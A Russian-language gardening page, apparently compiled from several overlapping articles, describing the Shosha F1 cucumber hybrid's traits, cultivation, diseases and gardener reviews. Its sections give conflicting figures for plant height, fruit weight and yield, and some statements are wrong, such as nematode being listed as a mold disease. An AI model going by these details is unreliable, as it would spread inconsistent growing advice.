0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание огурца шоша

Огурец Шоша F1 — описание сорта с фото

Нет такого овощевода, который бы не пробовал подобрать более подходящий для себя сорт среди многочисленных огуречных новинок. Перебирая предлагаемые селекционерами свежие гибриды, подыскивая идеальные варианты, вне всяких сомнений огородники останавливают свой взгляд на культуре с ласковым названием Шоша.

Агрофирма «Партнер» гарантирует невероятные результаты, которыми гибрид порадует своих потребителей.

Характеристика, описание сорта Шоша с фото

При испытаниях на практичность и условия выращивания огурца, исследуя показатели его урожайности, растение культивировали на открытом грунте, в теплицах, в бочке. Везде гибрид отличился великолепным урожаем. Шоша заявлен, как раннеспелая культура.

Культура допущена для выращивания в любом регионе страны. Стойкие и неприхотливые огурцы допускается выращивать:

  • В парниках и теплицах;
  • На открытых участках;
  • На подоконниках жилых помещений.

Поскольку Шоша гибрид, его посадочный материал маркируют всегда F1. Пакетированный материал или семена на развес без подобной маркировки, недопустимы и могут считаться подделкой.

Огуречный куст принадлежит к индетерминантному типу, средневетвистый, хорошо облиственный. Главный стебель часто превышает 2-х метровую высоту и нередко приближается к отметке 2,5 м. Помимо угловато-сердцевидной листвы среднего размера, на кустарнике встречаются довольно крупные экземпляры, имеющие размеры 38х30 см. Среднеморщинистые, имеющие шершавую поверхность листья держатся за стебли длинными черешками.

Питание растению подает мощная система корней. Партенокарпический гибрид имеет женский тип цветения. Букетный тип плодоношения предполагает образование в каждом узле по 3-4 завязи.

Зеленцы Шоша отличаются высоким товарным качеством: крепкие, упругие, имеющие красивую удлиненно-цилиндрическую форму. Средние параметры плоды имеют такие:

  • Диаметр – 3см;
  • Длина – 9-12 см;
  • Вес – 55-65 г.

Средне-бугорчатая поверхность огурца имеет белую опушку. Сама мякоть нежная, светло-зеленая, хрустящая и ароматная. Пустоты в плодах не образуются. В меру сладкий вкус горечи не имеет. В наполненных семенных камерах находятся молочной спелости семена.

У Шоши очень дленный период вегетации, и в тепличных условиях он продолжает плодоносить, когда иные огурцы уже свою вегетацию закончили. Высокий иммунитет огурца делает его устойчивым к мозаике, мучнистой росе, мишеневидной пятнистости.

Партенокарпические свойства Шоши позволяют завязывать плоды в закрытых помещениях даже в зимний период.

Снимают плоды, достигшие 10-11 см, но и оставшиеся незамеченными, огурцы не перерастут указанных в характеристике параметров, не потеряют свою сочность и нежный вкус. Применение зеленцов универсальное, но наиболее вкусны они малосольными.

Урожайность

Снимать урожай с Шоши можно спустя 40 дней от всходов. Многочисленные отзывы овощеводов свидетельствуют о превосходной урожайности гибрида. В Госреестре имеются данные, что товарная урожайность у парниковых культур составляет 14,3 кг с 1м².

Между тем, оригинатор гарантирует урожайность в теплицах около 18 кг с 1м², а на открытых участках можно собрать по 12 кг с 1м². Если пересчитать на каждое растение, то в результате каждый куст может отдать огороднику 4-5 кг огурцов.

Следует напомнить, что отличные показатели будут при доскональном соблюдении агротехнических правил.

Шоша начинает плодоносить с июня, а последний съем плодов, в зависимости от климатической зоны, проводят в августе-сентябре.

Плюсы и минусы

На семеноводческом рынке Шоша является новичком. Всего год назад селекционеры предложили его аграриям. И между тем, успевшие опробовать его овощеводы сразу добавили его в список перспективных, благодаря многим преимуществам:

  • Простая агротехника ;
  • Высокая урожайность ;
  • Продолжительность плодоношения ;
  • Высокая степень лежкости ;
  • Отличная транспортабельность ;
  • Устойчивость к заболеваниям .

Отличные характеристики гибрида оценены и фермерами, выращивающими зеленцы для оптовых продаж. Плоды хорошо переносят транспортные перевозки, могут сохранять свои качества 2 недели. Эти показатели позволяют поставлять огуречную продукцию в другие страны.

Особых недостатков Шоша не имеет. Они выделяются только при индивидуальных пристрастиях: вкус, сочность, внешний вид.

В основном, самым большим недостатком считают садоводы довольно высокие расценки на посевной материал этого гибрида. Приходится только покупать, поскольку самостоятельный сбор невозможен.

Посадка и уход

Агрофирмой реализуются только инкрустированные семена гибрида Шоша, обработанные активными биологическими веществами. Цвет защитной пленки может быть различный: голубой, розовый, желтый.

Дополнительная предпосадочная обработка им не нужна. Высадка в почву проводится даже без предварительного замачивания. Если приобретенные семена не имеют цветного покрытия, то обрабатывать их необходимо по установленному правилу.

Семенной материал Шоши отличается хорошей всхожестью. Культивирование возможно прямым посевом и через рассаду. Крайне важно перед высадкой огурцов проверить уровень кислотности почвы. Показатели должны быть нейтральными. Участок подвергают глубокой перекопке и предварительному внесению удобрений.

На 1 м² располагают не более 3 семечек, заглубляя их на 2 сантиметра. Сроки посева выпадают на май-июнь, все зависит от региона, главное, чтобы земля была прогрета до +15ºС. При нестабильности погоды над грядками устанавливают временные укрытия. Для Подмосковья оптимальный срок посева Шоши припадает на начало июня.

В более прохладных областях огурец культивируют рассадным методом. Для рассады подготавливают небольшие ящички, на дно которых выкладываются семечки, а сверху насыпается почва. Посев проводят из расчета за 4 недели до пересадки на грядки.

После посадки зерен им предоставляют должный уход:

  • Ежедневный малый полив;
  • Частое рыхление, чтобы обеспечить корни кислородом;
  • При появлении ненужных завязей их удаляют;
  • В фазе интенсивного роста применять жидкие удобрения.

Для полива подросшей рассады применяют теплую воду. По возможности, следует обеспечить капельный полив. В жаркую погоду влаги огурцу требуется больше, но следует увеличивать ее осторожно, так как растение не любит переувлажнение, тем более что чрезмерная влага может вызвать гнилостные заболевания. Почва на глубине 10 см должна быть постоянно слегка влажная.

Предупредить образование корок поможет мульчирование измельченной травой. Первая подкормка Шоши выполняется в самом начале цветения, далее проводятся еще 4 за весь период плодоношения гибрида. Процедуру проводят натуральными гуминовыми средствами: Кормилец, Плодородие, Идеал.

Формирование

На главном побеге, до 5-го листового узла удаляют все цветы и побеги. Выше по стеблю обрезают не очень быстро растущие побеги. Подвязывание проводят без узлов, скользящими петлями, не натягивая, позволяя гибриду свободно виться.

Огурец Шоша F1: видео

Отзывы садоводов

Хотя Шоша очень молодая, новая культура на рынке, он уже успел завести себе поклонников.

Огромное спасибо всем агрономам, подарившим нам чудо огурцы Шоша. Очень уж вкусны и маринованные, и свежие, и соленые. В особенности понравились малосольные. Корнишоны не теряют упругость, остаются крепенькие, хрустящие. А уж как порадовал урожай! Собирали его достаточно длительное время.

Шоша оказалась очень стойкой. Достойно перенесли засуху, и резкое неожиданное похолодание. Ни одно заболевание не поразило посадки. Это и личное наблюдение, и отзывы наших знакомых.

Павел Майков, Сургут:

В моей теплице Шоша стал плодоносить самым первым. Завязей образовалось очень много, наливаться стали быстро. Культура очень выносливая, и даже при нашем климате я получил достаточно большой урожай. Вкус приятный, особенно порадовал характерный хруст зеленцов.

Евгения Максимовна,Псковская область:

Я собрала с Шоши знатный урожай огурцов, но переработать все не успела – пришлось срочно уехать. Как я потом переживала, что хотя бы соседке не поручила огурцы. Через 2 дня я приехала, но все огурчики в летнике лежали свеженькие, будто только сорвала.

В уходе сложностей не было, даже проще, чем с иными гибридами. Вот от тли нужно обязательно профилактику делать. У нас ее этим летом целая волна была. У многих ленивых дачников урожай пропал. А я Шошу обработала, и собрала огромный урожай.

Характеристики гибрида выделяют его, как очень урожайный и раннеспелый. Агротехника выращивания простая, всем овощеводам вполне приемлема. С Шоши урожай не соберет только ленивый, да и то потому, что будет просто лень собирать.

Описание огурца Шоша

Если вы являетесь любителем вкусных овощей, то огурец Шоша – как раз тот сорт, который вам нужен. По мнению многих фермеров, такая овощная культура неприхотлива в выращивании и имеет хорошие вкусовые качества. Огурцы давно прижились в наших национальных блюдах. Ни одно застолье не обходится без такой овощной культуры.

Описание огурца Шоша

Описание овощной культуры

Огурец Шоша f1 – гибридный вид овощей, выведенный российскими селекционерами. Культура может произрастать во всех регионах страны. Особенно для такого типа овощей подходит климат центральных регионов страны.

Неприхотливые и стойкие к погодным переменам, овощи можно выращивать тремя способами:

  • в тепличных условиях;
  • высадка в открытый грунт;
  • произрастание на подоконнике в домашних условиях.

Характеристика растения

Имеет женский тип цветения и является самоопыляющимся растением. Цветы ярко-желтые по виду, напоминающие корону. Огурец Шоша f1 вырастает до 1,5 м в высоту. Плодоносить начинает спустя 38-45дней после высадки.

Каждый узел способен на формирование до 3-4 зеленцов. Характеристика говорит о том, что овощная культура имеет сильную корневую систему, которая снабжает все растение питательными веществами. Урожайность сравнительно высокая с м2 до 18 кг овощей.

Характеристика плодов

В описании огурцы Шоша f1 — это вкусные хрустящие овощи, которые понравятся вам своим сладковатым вкусом и полным отсутствием горечи. При продольном разрезе пустоты не образуются семян много, но они приятные на вкус:

  • цвет темно зеленый;
  • поверхность бугристая;
  • кожура – тоненькая приятная на вкус;
  • мякоть сладковатая, светло-зелёного оттенка;
  • вес плодов 50-60 г;
  • форма продолговатая, размер около 11 см в длину и 3 см диаметром.

Плюсы и минусы

Достоинства огурцов сорта Шоша f1 в первую очередь – это его отличные вкусовые качества, приятные на вкус, они подходят для употребления в сыром виде и производстве солений. Всем известно, что из сорта ф1 можно делать прекрасные соленья и маринады. Еще одним из главных плюсов является высокая урожайность.

Огурец Шоша f1 люди выращивают для собственного употребления в пищу. Также их растят в промышленных масштабах на продажу или переработку на производстве, где из них делают соления. Овощная культура имеет высокую степень лежкости и сохраняет свои внешние и внутренние качества в течении двух недель после сбора. Именно поэтому огурцы сорта Шоша отлично транспортабельны и могут экспортироваться в другие страны.

Данный сорт обеспечит вас хорошим урожаем

Также ко всему прочему овощ используют в косметологии и народной медицине. Огуречные маски очищают и освежают цвет кожи лица, снимают отек нижнего века. Отрицательных сторон у сорта не наблюдается. Минусы можно выделить только в случае индивидуальных пристрастий человека к некоторым вкусовым качествам.

Подготовка рассады

Посадить огурцы можно двумя способами: высадить семена или выращивать рассаду, а затем высаживать ее в открытый грунт. Чтобы вырастить рассаду, нам потребуется небольшие ящички, которые мы заполняем землей. Семена для рассады кладем на дно. Перед высадкой должен пройти период в 4 недели. Садить рассаду так же, как и семена, в открытый грунт следует не раньше середины апреля.

Чтобы растение могло справиться с перепадом температуры, рассаду заранее закаляют. Ящички с ростками следует по часу выносить на свежий воздух, а потом и вовсе оставить на полдня. Так мы подготавливаем ростки к возможным заморозкам. С семенами следует также провести процедуру закаливания: для этого их сначала вымачивают в медном купоросе, а затем заворачивают во влажное полотенце и помещают в холодильник на 2 часа.

Посадка огурцов

Перед тем, как высеять семена, следует удобрить почву и насытить ее кислородом. Для этого грунт перекапывают, удобряя перегноем или куриным пометом. Приступать к посадке овощной культуры можно, когда температура воздуха стабилизируется и на термометре будет 15 17.

Высаживать семена нужно по схеме не более 4-5 растений на м2, чтобы в ходе роста они не мешали друг другу. Чтобы посадить ростки, нам потребуется выкопать небольшие ямки. На дне углублений сделаем дренаж из песка.

После того, как вы высеяли семена, будущим всходам потребуется должный уход:

  • каждый день требуется умеренный полив;
  • несколько раз в неделю следует заниматься прополкой ваших ростков, дабы обеспечить корневую систему поступлением кислорода;
  • также следует следить за правильностью роста растения, ненужные завязи следует обрывать;
  • при интенсивном росте следует сдабривать жидкими удобрениями;
  • также растение требует подвязки.

Вредители и болезни

Если листья огурцов начали увядать и желтеть, то это повод насторожиться. Возможно, растение подверглось грибковой инфекции, которая влияет на общее развитие растения и качество плодов. Плесень вызывает такие болезни, как Нематода и Кладоспориоз.

Огурец F1 Шоша: описание сорта

Огурец Шоша – гибридный сорт отечественной селекции. Его разведением занималась агрофирма «Партнер», проводящая испытания культуры в открытом и защищенном нечерноземном грунте. Поэтому гибрид рекомендуется для выращивания в средней полосе России. Согласно положительным отзывам огородников данный сорт славится вкусными плодами и простотой в уходе.

Описание сорта Шоша

Огурец Шоша – описание растения:

  • среднерослое, со стеблем до 2 метров высотой;
  • корневище хорошо развитое с боковыми короткими ответвлениями;
  • цветение происходит без опыления насекомыми — по женскому типу;
  • цветки насыщенно-желтого цвета, имеют коронообразную форму;
  • листья ярко-изумрудные, небольшого размера.

Плоды

Огурцы Шоша f1 отмечены высокими вкусовыми качествами. Они темно-зеленого цвета с бугристой поверхностью и легким опушением. Кожица у них тонкая и хрустящая, без малейшей горечи во вкусе. Мякоть у огурцов светло-зеленая, плотной и сочной структуры с небольшим семенным включением, умеренно сладкая.

Огурец Шоша f1 вытянутой формы, до 10 см в длину и 3-4 см диаметром. Ориентировочный вес плода – 45-50 грамм.

Урожайность и плодоношение

Гибрид Шоша дает стабильно хорошую урожайность как при выращивании в тепличных условиях, так и в открытом грунте. От первых всходов до плодоношения проходит около 37-40 дней. С квадратного метра насаждений собирают до 15-17 кг зеленцов, при густоте посадки – 3-4 куста на 1 кв. м.

На показатели плодоношения влияет температурный и влажностной режим окружающей среды. Поэтому в теплицах и парниках собирают урожай побогаче, что обусловлено стабильным микроклиматом на протяжении всего вегетационного периода.

Огурцы Шоша до двух недель сохраняют исходные товарные качества при хранении в прохладе. Помимо этого они не портятся во время транспортировки на длительные расстояния.

Область применения

Сорт числится салатным, но сфера его применения широкая. Снятые с куста корнишоны (неполноценной зрелости огурцы) идеально подходят для соления (маринования) и различной домашней консервации. Не менее вкусны огурцы Шоша в свежем виде и в составе летних салатов.

Семенной материал сорта Шоша f1 имеется в свободной продаже в цветоводческих магазинах. Стоимость одного пакетика не превышает 60 руб.

Устойчивость к болезням и вредителям

Гибридные огурцы Шоша ценятся среди дачников за устойчивость к вирусным и грибковым заболеваниям, присущим пасленовым. К таковым относятся: огуречная мозаика, мучнистая роса, вирус пожелтения плодов.

Из вредителей особо опасна листовертка, которая паразитирует на огурце Шоша. Но простые профилактические меры способны защитить растение от вредоносных атак.

Достоинства и недостатки сорта

Огурцы сорта Шоша f1 можно рассматривать с двух сторон. Достоинства и недостатки представлены в таблице:

Преимущества Недостатки
· высокие вкусовые характеристики;

· широкая область применения;

· продолжительный срок хранения;

· возможность транспортировать без ущерба качеству и внешнему виду;

· устойчивость к заболеваниям и поражениям вредителей.

По садоводческим отзывам огурец Шоша практически не имеет недостатков.

Выращивание

Огурцы сорта Шоша подходят для выращивания в домашних и промышленных масштабах. В силу их высокой адаптационной способности к внешним факторам могут успешно расти как на грядке, так и в теплице. Для получения раннего урожая потребуется предварительная заготовка рассады.

Рассадным способом

Посадка огурцов Шоша возможна как рассадой, так и семенами. На рассаду сеют семена с середины апреля, в грунт – не раньше мая.

Методика выращивания рассады, следующая:

  1. В небольшие ящики засыпают рассадный субстрат.
  2. Семена распределяют ближе ко дну.
  3. До пересадки на грядки должно пройти около 4 недель.

Перед посадкой рассаду закаляют на протяжении 1.5-2 недель. Для этого ежедневно ящики выносят на свежий воздух. Начинают с 15 минут, постепенно увеличивая время пребывания на улице до 5-6 часов.

Высадку рассады осуществляют, когда погода стабилизируется до 15-16 °С, а земля достаточно прогреется. Предварительно участок перекапывают с добавлением перегноя и птичьего помета. На 1 кв. м. рекомендуется размещать не более пяти кустов. Место подбирают открытое с полноценной освещенностью – в тени огурцы Шоша чахнут.

На готовой к пересадке рассаде должно быть несколько развитых листков. На дно посадочных лунок желательно засыпать слой речного песка в качестве дренажа. Придерживают куст одной рукой, а другой расправляют корни по внутреннему объему ямки. Важно, чтобы корешки не загибались. Сразу рассаду не поливают, только через 2-3 дня и только, если теплая погода.

Безрассадным способом

На гряды семена огурцов Шоша высаживают с середины мая до начала июня. Заблаговременно землю перекапывают (за 3,5-3 недели), и вносят: органику, доломитовую муку, опилки, торф, листовой компост.

Лучшими предшественниками для огурцов являются:

Перед высаживанием семена отмачивают в воде комнатной температуры. Качественный материал оседает на дно, плавающий на поверхности сразу отбраковывают.

Последующий уход

Уход за огурцами Шоша подразумевает ряд обязательных мероприятий:

  • ежедневный умеренный полив;
  • внесение жидких подкормок в период активного роста;
  • прополка каждую неделю и удаление сорняков;
  • подвязку кустов к вертикальным шпалерам по мере роста.

Поливу следует уделять особое внимание. Недопустим перелив, чтобы вода застаивалась в лунках. Это влечет поражение грибком и затормаживает вегетационные процессы – листья сохнут, желтеют и опадают. Но и засуха негативно сказывается на развитии культуры и дальнейшем плодоношении. Необходимо, чтобы почва постоянно была влажноватой.

Формирование куста

На протяжении всего вегетационного периода необходимо осуществлять пасынкование огуречных кустов – удаление лишних побегов. Убирают пазушные пустые побеги длиной не менее 7 см, расположенные на уровне 3-4 и 5-6 листа. Если их оставить, то урожайность значительно снизится. Это обусловлено тем, что растение будет затрачивать лишние силы на развитие пасынков.

Заключение

По отзывам и техническим характеристикам огурец Шоша можно причислить к высокоурожайным сортам. Гибрид раннеспелый с хорошей лежкостью и транспортабельностью. Подходит для промышленного и частного выращивания. Ценится дачниками за устойчивость к погодным явлениям, неприхотливость в уходе и универсальность в применении плодов.

Отзывы

Ольга Евгеньевна, 45 лет, Псковская область

В этом году впервые посадила на своем дачном участке огурцы сорта Шоша. Результат превзошел все ожидания. Урожай собрала богатый, который быстро не удалось переработать. Но порадовало то, что даже через несколько дней лежания огурцы остались по-прежнему свежими и хрустящими. Отдельно стоит отметить выносливость культуры относительно болезней и вредителей. Сосед, давно выращивающий этот сорт, посоветовал обработать кусты инсектицидами от тли, что я и сделала.

Алевтина Михайловна, 42 года, г. Тверь

Огурцы Шоша один из самых моих любимых сортов. Сажаю их непосредственно в грунт семенами, поскольку нет возможности самой выращивать рассаду. Каждый раз всходят практически все посаженные семена. Посадку провожу в начале июня, когда на улице устанавливается теплая погода. Урожай снимаю стабильно хороший каждый сезон. Огурцы в основном солю и мариную, поэтому собираю плоды раньше времени.

Николай Валерьевич, 50 лет, Ленинградская область

Я заядлый огородник и люблю экспериментировать с разными культурами. Довольно трудно подобрать вкусные и качественные овощи, что касается и огурцов. По рекомендации соседа решил посадить огурцы Шоша и не прогадал. Плоды созревают плотные, хрустящие, вкусные и ароматные. Идеально подходят для свежих салатов. Дополнительным бонусом является их длительный срок хранения в холодильнике.

Ольга Евгеньевна, 52 года, Подмосковье

Выращиваю огурцы Шоша в теплице и на улице. Тепличные собираю уже в середине июня. Их в основном съедаем в свежем виде. А вот те, что в открытом грунте, начинают поспевать в середине лета. Вот они идеально подходят для засолки – все одного размера, как на подбор. Эти огурцы нравятся всем домочадцам – вкусные, хрустящие и аппетитные.

Новый, но перспективный и успевший завоевать сердца многих огородников сорт огурцов «Шоша»

Огурец – очень популярный продукт. Его выращиванием занимается практически каждый огородник. Особое внимание дачники уделяют новым гибридам, среди которых выделяется Шоша. Это растение приносит обильный и качественный урожай. Ровные и красивые огурчики не оставляют равнодушным никого.

Описание огурцов

Гибрид Шоша вывели российские селекционеры из агрофирмы «Партнер». Хорошую урожайность культура показывает при выращивании в тепличных условиях, но ее с успехом культивируют и в открытом грунте. Растение среднерослое. Главный стебель достигает 1,5–2 м. Шоша развивает мощную корневую систему и короткие боковые побеги.

Отличительные черты

На внешний вид огурцы имеют одинаковую форму. На их поверхности расположены характерные бугорки с небольшими шипами. Плоды растения имеют прекрасный товарный вид.

Состав, свойства, польза, калорийность

Огурец прекрасно утоляет жажду. Этот овощ содержит около 90% структурированной воды. В остальных 10% находятся полезные минералы и витамины: А, В1, В2, С, Е, РР, Н. Также в состав огурца входят:

  • кальций;
  • крахмал;
  • фруктоза;
  • глюкоза;
  • фосфор;
  • каротин;
  • натрий;
  • калий;
  • йод;
  • магний.

Кроме этого, овощ содержит фолиевую, кофейную и аскорбиновую кислоты.

Калорийность на 100 г продукта – 15 ккал:

Характеристики

Гибрид Шоша имеет женский тип цветения. Растение опыляется самостоятельно, что облегчает выращивание культуры в тепличных условиях. Форма цветка в виде короны, цвет ярко-желтый. Один узел дает до четырех плодов. Листва зеленая, среднего размера.

Бугристые плоды слегка опушены, имеют тонкую кожуру, без горечи. Мякоть светло-зеленого цвета. Длина овоща – в пределах 10 см, диаметр – около 4 см. Один огурец весит 40–60 г. Плоды имеют маленькие и нежные семена.

Первые зеленцы созревают уже через 40 дней после появления всходов. При должном уходе Шоша дает 12–14 кг урожая с 1 кв. м.

Как вырастить огурцы Шоша самостоятельно

Гибрид Шоша выращивают как рассадным способом, так и прямым посевом в грунт. Первый вариант дает более высокую урожайность. Культура хорошо себя показывает в тепличных условиях. Но при любом способе посева семена обеззараживают в слабом растворе марганцовки в течение 20–30 минут.

Рассадный способ

Для выращивания рассады семена высевают в отдельные емкости с грунтом в начале апреля. Перед посевом семенной материал проращивают. Для этого зерна заворачивают во влажную хлопчатобумажную ткань и по мере подсыхания увлажняют.

Емкость с замоченными семенами до проращивания держат в теплом помещении с температурой не менее +25 °С. Ростки появляются на второй-третий день. После этого приступают к посеву.

Важно! Огурцы плохо переносят пикирование. Поэтому семена обязательно сеют в индивидуальные емкости.

Для выращивания рассады готовят питательный, рыхлый и влагоемкий грунт. Для этого смешивают следующие компоненты:
  • чистый речной песок (1 часть);
  • дерновую землю (2 части);
  • перегной (3 части).

После появления всходов огурцы своевременно увлажняют теплой водой. Воду используют колодезную, дождевую или отстаивают водопроводную. Пересаживают на постоянное место, когда минует угроза заморозков. Возраст рассады будет составлять примерно 25–30 дней.

Прямой посев в грунт

Огурец – теплолюбивая культура. Его семена начинают прорастать при температуре не менее +15 °С, поэтому весенний посев в открытый грунт производят на грядки, утепленные навозом.

Сроки посева – с начала до середины мая, в зависимости от региона. Зерна углубляют в грунт на 1 см. Когда появляются всходы, между растениями оставляют 30–40 см. Остальные сеянцы при желании пересаживают. Для этого саженцы выкапывают с комом земли и пикируют в заранее подготовленные лунки.

Важно! На 1 кв. м высаживают не более трех растений. При такой схеме посадки Шоша дает более высокую урожайность.

Поэтапное выращивание и уход

Основной уход за огурцами Шоша заключается в регулярном увлажнении почвы. Если погода стоит жаркая, растения поливают каждый день. У огурцов поверхностная корневая система, поэтому полного пересыхания почвы под кустами не допускают. Культуру увлажняют теплой водой.

На урожайность огурцов негативно влияет образование почвенной корки. Это приводит к кислородному голоданию растений. Поэтому после полива обязательно рыхлят почву. Также грунт мульчируют слоем перегноя или торфа. Органика хорошо удерживает влагу и служит дополнительным источником питания.

Удобрения совмещают с увлажнением почвы. Подкармливают огурцы раз в 10–14 дней настоем коровяка с добавлением золы и «Суперфосфата». Первое удобрение вносят перед цветением растений.

На заметку. Огурцы имеют склонность к накоплению нитратов, поэтому азотные удобрения используют в меру.

У гибрида Шоша развиваются длинные и мощные плети, поэтому по мере роста культуру подвязывают к шпалере. Устанавливают опоры после появления первого полноценного листка.

Для получения высокой урожайности кусты формируют: все боковые побеги в первых трех-четырех листовых пазухах удаляют. Если этого не сделать, растения будут расходовать жизненные силы на развитие зеленой массы.

В результате культура начнет плодоношение с запозданием и урожайность существенно снизится. Удаляют боковые побеги, когда их длина достигнет 4-5 см. Дальнейшего отрастания не допускают. Чем длиннее пасынки, тем хуже культура переносит их удаление.

Особенности выращивания и возможные трудности

Участок для посадки огурцов выбирают в таком месте, где отсутствуют сквозняки. Для защиты растений от порывов ветра по периметру высаживают подсолнечник или кукурузу. Высевают эти культуры в последней декаде апреля в два-три ряда с промежутком 25 см. Такая защита быстро вырастает и создает красивый естественный забор.

Грунт для посадки огурцов подготавливают заранее. В южных регионах овощ выращивают в полутени, а для более северных областей с прохладным летом выбирают солнечный участок.

Болезни и вредители

Шоша F1 имеет хорошую устойчивость к болезням и вредителям, но из-за непредсказуемой погоды или чрезмерного увлажнения риск заболевания культуры все же есть.

Самые распространенные болезни огурцов:

  1. Серая гниль. На стебле появляются темные пятна, а на плодах – серый налет. Пораженные места присыпают и слегка потирают золой. Увлажнение культуры приостанавливают – лишние поливы провоцируют и усиливают эту болезнь. Также в борьбе с серой гнилью используют препараты «Байлетон» или «Эупарен».
  2. Мучнистая роса. На листьях и стебле появляются пятна белого или рыжего цвета. Пораженные участки протирают древесной золой или удаляют. Также растения опрыскивают раствором коровяка или коллоидной серой.
  3. Белая гниль. Плоды постепенно покрываются белой слизью, а затем начинают гнить. В этом случае зараженные части удаляют или посыпают известью-пушонкой. Болезнь появляется из-за избыточного увлажнения растений.
  4. Корневая гниль проявляется темными пятнами возле корней. Стебель начинает гнить, что приводит к отмиранию корней. Заболевание провоцируют сильные перепады температур, частые дожди или поливы. Пораженным местам дают подсохнуть и присыпают их известью или золой. Растения увлажняют только вокруг кустов. Для предупреждения болезни почву дезинфицируют раствором марганцовки.
  5. Мозаика. На листьях появляются светлые или темно-зеленые пятна, затем листва деформируется. Нередко болезнь поражает и плоды. Заболевание попадает через семена или остатки предыдущих культур. Для профилактики зерна и грунт дезинфицируют перманганатом калия. Больные растения удаляют.
  6. Оливковая пятнистость. Болезнь проявляется в виде бурых пятен. Причины: полив огурцов холодной водой, сквозняки или частые дожди. Если заболевание поразило культуру, огурцы не увлажняют пять дней и обрабатывают средством «Оксихом» или бордоской жидкостью.

При выращивании огурцов овощеводы часто сталкиваются с вредителями, что сильно снижает урожайность. Наиболее распространенные насекомые-вредители:

  1. Паутинный клещ. С его появлением листва покрывается маленькими белыми пятнами и тонкой паутинкой. Размер вредителя – примерно 0,5 мм. С этими насекомыми справляются биопрепаратами «Фитоверм» или «Актофит».
  2. Белокрылка. Это маленькая белая мошкара, которая наносит вред огурцам. Для избавления регулярно удаляют сорную траву, опрыскивают и промывают листву водой или используют биопрепарат «Боверин».
  3. Бахчевая тля. Насекомые поражают листву, завязи и цветки. Кусты начинают сохнуть, а листья скручиваться. Вредитель зимует в остатках растительности. Тлю уничтожают биопрепаратом «Вертициллин».

Сбор и применение урожая

Когда плоды достигают нужного размера и веса, их аккуратно снимают. Зеленцы на кустах не передерживают, так как это замедлит развитие новых огурцов и ослабит растения. В период массового плодоношения урожай собирают через день, особенно если гибрид растет на грядах в расстил.

Огурцы Шоша в основном используют для приготовления свежих салатов. Небольшие зеленцы отлично подходят для засолки и домашней консервации.

Преимущества и недостатки

Огородники полюбили огурец Шоша F1 за множество положительных качеств. Преимущества гибрида:

  • дает ранний урожай;
  • имеет крепкий иммунитет;
  • плодоношение происходит длительно;
  • посадка и уход не требуют особых усилий;
  • высокая урожайность (с 1 кв. м собирают до 12–14 кг зеленцов);
  • отлично растет как в теплице, так и в открытом грунте, и даже в небольших затенениях;
  • универсальность применения плодов;
  • отличные вкусовые качества;
  • хороший товарный вид;
  • транспортабельность.

Недостатков гибрид имеет немного. К ним относятся:

  • с огурцов Шоша F1 не собирают семена для дальнейших посевов, так как это гибрид, а не сорт;
  • требовательность к подвязке;
  • высокая стоимость семян.

Положительных качеств Шоша имеет больше, чем недостатков, из-за чего многие дачники отдают предпочтение именно этому гибриду.

Отзывы

Огородники, которые уже выращивали огурцы Шоша, отзываются о них в основном с положительной стороны. Этот овощ культивируют в большинстве регионов страны. Приведем отзывы некоторых дачников.

Екатерина, Подмосковье: «В середине апреля посеяла семена Шоши в открытый грунт, и уже к концу мая начали появляться огурчики. Всхожесть у семян отличная, завязей образуется много. На вкус корнишоны прекрасные, кожура твердая и хрустящая. Зеленцы имеют отличный вид, они красивые, как на фото, один в один. Я эти огурчики использую для засолки и консервации, в баночке они выглядят очень аппетитно».

Наталья, г. Мценск: «Огородом начала заниматься недавно. Огурцы до этого никогда не выращивала. Соседи посоветовали Шошу. Выбрала для гибрида рассадный способ. На постоянное место в открытый грунт пересаживала в мае. Огуречные кусты выросли почти двухметровые. Много времени растениям не уделяла, только по мере необходимости поливала и пропалывала. Два раза удобряла настоем коровяка. Овощей уродилось много. Вкусные огурчики ели в свежем виде и использовали для переработки. В следующий раз посажу еще больше. Гибрид Шоша достоин внимания».

Валентина, г. Ростов-на-Дону: «В прошлом году в садоводческом магазине купила семена огурцов Шоша F1. Урожаем осталась довольна, столько овощей от гибридной культуры у меня еще не было. Я выращивала и наши гибриды, и голландские, но Шоша всех их опередил по всем пунктам. Ухаживать за посадками легко. Небольшие, ровные и хрустящие огурчики имеют сладкий вкус. Бугорков и шипов много, но они не колючие. Дети срывали плоды прямо с кустов, промывали и сразу ели. В общем, огурец Шоша мне и моей семье очень понравился».

Заключение

Огурец Шоша – это популярный ранний гибрид, который с успехом выращивают как в теплице, так и в открытом грунте. Технология культивирования Шоши ничем не отличается от агротехники других огурцов.

Опытные дачники отдают предпочтение этому гибриду за высокую стабильную урожайность и хорошую устойчивость культуры к болезням. Огурцы не имеют горечи и долгое время сохраняют аромат и свежесть.

Огурец Шоша F1 – описание сорта, посадка семян и уход, отзывы и фото

Трудно найти огород, на котором не выращивали бы огурцы. Этот овощ достаточно популярен в наших краях. Особого внимания заслуживают новые сорта и гибриды. Шоша – новый раннеспелый гибрид. Согласно описанию сорта, отзывам и фото огурец Шоша F1 – раннеспелый гибрид с преобладанием женского типа цветения. Ценится за высокие показатели урожайности и высокую устойчивость к заболеваниям. Гибрид нисколько не уступает именитым зарубежным аналогам. Его красивые и ровные огурчики не оставят равнодушным ни одного огородника.

История селекции

Сорт огурца Шоша F1 – достижение отечественных селекционеров. Его выведением занимались специалисты агрофирмы Партнер. В частности Блокалин Василий Иванович, именно он признан оригинатором.

В Госреестре сортов находится полное описание гибрида Шоша F1. Согласно данным госреестра гибрид подходит для выращивания в различных климатических зонах России, в открытом и защищенном грунте.

Описание

Для образования зеленцов, гибриду Шоша не требуется участие насекомых опылителей, сорт относится к так называемым партенокарпикам.

От момента появления всходов до образования первых плодов проходит 40-45 дней. В каждом междоузлии Шоша формирует 1-3 зеленца. Плоды короткие, бугорчатые, белошипые. Длина огурчиков составляет 9-11 см, при диаметре 3 см и средней массе около 80 грамм.

Гибрид Шоша отличается повышенной устойчивостью к:

  • различным видам пятнистостей;
  • огуречной мозаике;
  • мучнистой росе.

Средняя урожайность Шоши составляет 12-18 кг/м².

Зеленцы можно использовать:

  • в свежем виде;
  • для засола;
  • для маринования.

Достоинства и недостатки

У гибрида Шоша недостатков почти нет. Из минусов можно отметить только достаточно высокую стоимость семян. Но этот недостаток с лихвой перекрывается высокой урожайностью и высокими вкусовыми качествами плодов.

Из преимуществ особо следует отметить следующие:

  1. Высокое качество зеленцов. Плоды Шоши тонкошкурые, без горечи, с нежной сочной мякотью.
